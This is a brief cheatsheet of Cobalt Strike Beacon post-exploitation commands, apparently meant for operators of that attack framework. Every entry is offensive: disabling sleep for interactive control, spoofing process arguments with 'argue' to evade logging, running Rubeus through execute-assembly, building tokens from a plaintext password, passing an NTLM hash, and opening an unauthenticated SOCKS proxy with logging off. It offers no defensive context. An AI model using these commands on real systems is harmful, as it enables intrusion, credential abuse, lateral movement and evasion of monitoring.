Cheatsheet

Beacon control:

# Sleep 
sleep 0 # make the Beacon interactive (no sleep between check-ins)


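# argue takes a command and a set of fake arguments; when that command is later run, the command line recorded at process creation shows the fake arguments instead of the real ones: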
argue whoami /totally-legit
argue powershell -command "get-adcomputer -Filter {...} ..... 

Execute Binaries:

# Execute a local .NET assembly on the target
execute-assembly /root/Rubeus.exe

Session Control:

# Make a token from a username and password for the current session
make_token darth.vadar deathstar123!

# Pass the Hash
pth darth.vadar 91d85135bb2c4e12c46efbb77612c487

Socks (SOCKS5 proxy on port 65001, with authentication disabled and logging off):

socks 65001 SOCKS5 enableNoAuth "" "" disableLogging
